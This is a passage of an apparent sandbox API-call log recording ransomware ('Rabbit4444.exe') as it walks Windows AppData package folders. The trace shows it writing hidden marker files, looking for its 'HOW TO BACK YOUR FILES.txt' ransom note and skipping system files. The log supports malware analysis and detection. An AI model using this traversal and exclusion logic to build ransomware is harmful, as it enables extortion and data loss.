lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache" [0064.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123080 | out: hHeap=0xe0000) returned 1 [0064.557] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122100 | out: hHeap=0xe0000) returned 1 [0064.557] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache" [0064.557] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\" [0064.557] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0064.557] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.558] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.560] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.561] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.561] CloseHandle (hObject=0x2cc) returned 1 [0064.562] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache") returned 89 [0064.562] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.562] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152ab04, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefce2006, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0064.562] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.562] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.562] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.562] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.562] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xea16dae4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd152ab04, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefce2006, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.562] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.562] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.562] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.562] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefce2006, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefce2006, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefce2006, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.562] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.562] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.562] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefce2006, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefce2006, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefce2006, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.562] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0064.562] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.562] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsAlarms_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsalarms_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.563] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.563] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.563] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.563] CloseHandle (hObject=0x2a0) returned 1 [0064.563] CloseHandle (hObject=0x2cc) returned 1 [0064.563] GetCurrentThreadId () returned 0xd98 [0064.564] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11cd28 [0064.564] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy" [0064.564] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119368 | out: hHeap=0xe0000) returned 1 [0064.564] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cd20 | out: hHeap=0xe0000) returned 1 [0064.564] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy" [0064.564] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\" [0064.564] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0064.564] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.windowpicker_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.567] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.570] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.571] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.571] CloseHandle (hObject=0x2cc) returned 1 [0064.573] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy") returned 83 [0064.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.573] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.WindowPicker_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefce2006, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.573] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.573] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.573] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.573] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.573] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xefce2006, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.574] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.574] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.574] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.574] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.574] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.574] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefce2006, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefce2006, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefce2006, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.574] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.574] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.574] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x71ce0e7e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71ce0e7e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71ce0e7e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.574] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0064.574] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0064.574] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0064.574] lstrcpyW (in: lpString1=0x130ebe0, lpString2="AC" | out: lpString1="AC") returned="AC" [0064.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122280 [0064.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x123bd8 [0064.574] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122288 | out: ListHead=0xf68b0, ListEntry=0x122288) returned 0x11d008 [0064.574] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0064.574] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0064.575] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0064.575] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0064.575] lstrcpyW (in: lpString1=0x130ebe0, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0064.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122140 [0064.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123200 [0064.575] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122148 | out: ListHead=0xf68b0, ListEntry=0x122148) returned 0x122288 [0064.575] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0064.575] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0064.575] lstrcpyW (in: lpString1=0x130ebe0, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0064.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0064.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0xefb28 [0064.575] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x122148 [0064.575] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0064.575] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0064.575] lstrcpyW (in: lpString1=0x130ebe0, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0064.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0064.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11e0b0 [0064.576] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122068 [0064.576] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0064.576] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0064.576] lstrcpyW (in: lpString1=0x130ebe0, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0064.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0064.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116ba0 [0064.576] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x121fe8 [0064.576] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0064.576] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0064.576] lstrcpyW (in: lpString1=0x130ebe0, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0064.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0064.576] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x11e178 [0064.576] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122368 [0064.576] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x71c949cf, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x71c949cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x71c949cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0064.577] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0064.577] lstrcpyW (in: lpString1=0x130ebe0, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0064.577] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0064.577] RtlAllocateHeap (HeapHandle=0xe0000, 